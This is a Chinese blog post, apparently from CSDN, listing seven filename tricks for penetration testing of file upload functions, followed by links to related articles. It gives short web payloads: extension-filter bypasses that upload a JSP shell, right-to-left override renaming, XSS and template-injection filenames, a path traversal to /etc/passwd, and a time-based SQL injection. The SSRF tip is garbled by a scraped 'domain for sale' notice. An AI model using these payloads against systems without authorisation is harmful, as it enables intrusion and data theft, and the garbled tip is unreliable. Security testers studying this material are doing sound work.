常见的测试文件上传方法

最新推荐文章于 2024-05-16 19:53:41 发布
最新推荐文章于 2024-05-16 19:53:41 发布
阅读量1.5k 收藏
点赞数
分类专栏: 文件上传 文章标签: java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52501704/article/details/128356568
版权

第一种:如果对文件类型进行了过滤只能上传JPG,PNG的话可以对文件名进行编码

例子:image.jpg的话可以改成image.jpg%23.html可能会绕过文件类型

第二种:如果还是对文件类型进行了过滤可以尝试一下换行:

例子:1.FileName=shell.jspx.

                                    jsp

         2.File

         Name=shell.jspx.jsp'

第三种:对文件修改成ip-v4.com domain is for sale | Buy with Epik.com可能会有惊喜(Blind SSRF)

第四种:尝试使用右到左覆盖,重命名上传的文件。比如说为namename.%E2%80%AEphp.jpg,现在改为name.gpj.php

第五种:文件名可能会存在XSS把文件名修改成:'"><img src=x onerror=alert(document.domain)>.extension或者 {{constructor.constructor('alert(1)')()}}.extension

第六种:可能会造成任意文件读取把文件名修改成:image.png../../../../../../../etc/passwd

第七种:可能会存在Time-Based SQLi修改文件名称:poc.js'(select*from(select(sleep(20)))a)+'.extension

H1111B
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传功能如何测试
xuyandics的博客
12-29 4503
1.文件类型检查 指定的文件类型,允许上传 指定之外的文件类型,不允许上传并做出合理提示 指定的文件类型后缀大写,允许上传 指定的文件类型后缀大小写混合,允许上传 2.文件大小检查 假设限制上传文件最大为X: 指定文件类型的文件小于X,允许上传 指定文件类型的文件等于X,不允许上传 指定文件类型的文件大于X,不允许上传并给出合理提示 指定文件类型的文件等于0,视具体需求看是否允许上传 非指定文件类型的文件大于X,不允许上传并给出合理提示 剩余存储空间不足,上传失败并做出提示 剩余存储空间已满,上传失败并做
上传文件测试
q297422的博客
06-28 2568
上传文件测试
Web安全文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2511
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
文件上传检测方式和绕过方法
qq_45775897的博客
01-11 6102
一、客户端检测(例:js检测) 客户端检测最典型的方式就是 JavaScript 检测,由于 JavaScript 在客户端 执行的特点,可以通过修改客户端代码或先上传符合要求的文件再在上传过 程使用 BurpSuite 等工具篡改文件等方式来绕过。 绕过方法 抓包:修改文件后缀。 浏览器关闭js 二、MIME 类型检测 是设定某种扩展名的文件用一种应用程序来打开的方式 类型,当该扩展名文件被访问的时候,浏览器会自动使 用指定应用程序来打开。 多用于指定一些客户端自定义的文件名,以及一些媒体 文件打开
接口测试文件上传(超详细)
最新发布
HUA1211的博客
05-16 354
首先,要知道文件上传的一般原理:客户端根据文件路径读取文件内容,将文件内容转换成二进制文件流的格式传输给服务端,而服务端接受客户端传过来的二进制文件流以及文件名称等信息(此时这些二进制文件流存储在内存中),然后将其写入存储空间(即磁盘中),完成上传操作,返回给客户端信息。至此,请求发送完毕,查看postman接收到接口返回上传完成信息,上传文件成功出现在目录中(如下图)。在日常工作中,经常有上传文件功能的测试场景,因此,本文介绍两种主流编写上传文件接口测试脚本的方法。ok,知道原理后,开始操作。
软件测试常用测试点之文件上传
qq_37772593的博客
05-16 1827
6.如果有多个客户端,多个客户端同时上传多个文件,而文件中有个别文件名相同,系统如何处理。8.批量上传过程中,发生异常中断,是部分未传完的文件撤销,还是全部文件撤销。7.批量上传过程中,部分文件,被撤销,是否会影响其他正常上传的文件。2.上传过程中断网,恢复网络后,是否能接着已上传的进度,继续上传。视频:mp4/avi/flv/mov/swf/wmv/qlv…3.文件上传过程中,是否支持取消,正在上传的文件。4.文件上传过程中,在本地删除文件,是否支持删除。图片常用格式:jpg/png/gif/bmp……
文件上传通用测试点归纳总结
大田的博客
07-17 6113
1、上传符合被测系统格式(exe、rar、zip、txt、html等)2、上传正常大小的文件(注意边界值文件最大值、文件为0kb)5、上传成功后,删除后可以重新上传(替换操作)3、上传成功后,可以下载并查看文件是否完整。6、弱网测试,网速很慢时导致文件上传超时。4、上传成功后,可以删除上传的文件。5、上传木马文件,看能系统能否识别。6、上传成功后,界面显示是否正常。9、上传过程中,能否取消上传操作。2、上传超过系统规定大小的文件。10、选好文件后,取消上传操作。2、上传成功后,能看到文件名。...
WEB安全基础-文件上传
HAKUNAMATATATTA的博客
11-21 2507
什么是文件上传---将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。
渗透测试-任意文件上传及客户端绕过案例
lza20001103的博客
04-25 902
任意文件上传及客户端绕过案例
Python接口测试文件上传实例解析
09-16
在本文中,我们将深入探讨如何使用Python的`requests`库来测试文件上传接口,通过一个具体的图片上传例子进行说明。 首先,我们需要了解接口上传文件的基本原理。通常,文件上传是通过HTTP的`POST`请求实现的,使用...
Springboot文件上传功能简单测试
08-19
Springboot框架是当前web开发中最流行的框架之一,文件上传web开发中最常见的需求之一。本文将详细介绍Springboot文件上传功能简单测试,通过示例代码详细地讲解了文件上传的实现过程。 文件上传web开发中最...
文件上传和下载的常见测试
01-12
文件上传和下载是许多应用程序和网站的基本功能之一,在进行测试时需要考虑多个方面的测试点,以下是文件上传和下载的常见测试点: 下载测试点 1. 右键另存为是否可以正确下载文件,并且记录下载次数 * 是否正确...
文件上传测试的用例
03-26
在IT行业中,大文件上传是一项常见的功能,尤其在云存储、社交媒体、文件共享等服务中。测试用例是确保此功能稳定性和效率的关键步骤。以下是对"大文件上传测试用例"及相关文件的详细解释: 1. **测试用例设计**...
接口测试文件上传
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
08-04 1101
在日常工作中,经常有上传文件功能的测试场景,因此,本文介绍两种主流编写上传文件接口测试脚本的方法。 首先,要知道文件上传的一般原理:客户端根据文件路径读取文件内容,将文件内容转换成二进制文件流的格式传输给服务端,而服务端接受客户端传过来的二进制文件流以及文件名称等信息(此时这些二进制文件流存储在内存中),然后将其写入存储空间(即磁盘中),完成上传操作,返回给客户端信息。
WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3327
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
文件上传测试思路
xiaoheizi的博客
06-29 155
黑盒测试是没办法测试出这个漏洞的,因为我们无法知道上传的文件名(文件名变成了0x0.php),只能配合白盒测试。本次测试——漏洞都是黑盒测试出来的,白盒的作用就是查看文件名。1.进入网站首页查找文件上传功能,在会员中心发现头像上传。尝试将文件类型更改为php,文件数据更改为php脚本代码。查看上传目录,成功生成一个0x0.php文件。路径更改为/0x0.php,脚本代码成功执行。上传文件名filename:没看到。上传文件数据:被base64编码了。正常上传jpg头像抓包测试。在网站的头像右键查看图片。
Web测试文件上传测试
伤心的辣条
12-06 993
功能实现: (1)文件类型正确、大小合适。 (2)文件类型正确,大小不合适。 (3)文件类型错误,大小合适。
Postman测试文件上传接口
又菜又爱玩的小熊
12-21 4793
文章目录一、Postman测试文件上传接口1、创建一个请求→选择请求方式→填写请求的URL→填写请求的参数值2、选择 "Body" → "form-data" → "Test" → "File"3、点击 "Select Files"4、选择要上传的文件5、点击 ''Send'' 进行测试6、查看测试结果7、可以将测试结果返回的URL复制到浏览器的地址栏进行查看 一、Postman测试文件上传接口 1、创建一个请求→选择请求方式→填写请求的URL→填写请求的参数值 2、选择 “Body” → “form-d
文件上传下载测试
伤心的辣条
07-01 1646
目前关于云文档的业务还是挺多的,相信出去面试的同学,大多会遇到这道高频软件测试面试题:文件上传下载测试点,今天,索性就跟大家分享下,希望对大家有所启发。
文件上传漏洞测试方法
07-29
文件上传漏洞的测试方法可以通过以下步骤进行: 1. 准备一个测试文件,可以是木马文件或其他任意文件。在测试中,可以使用php探针作为测试文件,文件名为phpinfo.php,文件内容为`<?php phpinfo(); ?>`。\[1\] 2. 进行文件上传前期盲测。这一步可以使用多个安全检测工具对应用系统进行安全扫描,以及时发现潜在漏洞并修复。\[2\] 3. 检测绕过上传漏洞常见于用户选择文件上传的场景。如果上传文件的后缀不被允许,则会弹框告知,此时上传文件的数据包并没有发送到服务端,只是在客户端浏览器使用JavaScript对数据包进行检测。\[3\] 综上所述,文件上传漏洞的测试方法包括准备测试文件、进行安全扫描和检测绕过上传漏洞。 #### 引用[.reference_title] - *1* *3* [【文件上传漏洞-03】前端JS检测与绕过实例—以upload-labs-1为例](https://blog.csdn.net/m0_64378913/article/details/124908011)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Web安全 文件上传漏洞的 测试和利用.(上传一个图片或文件 拿下服务器最高权限.)](https://blog.csdn.net/weixin_54977781/article/details/122911968)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值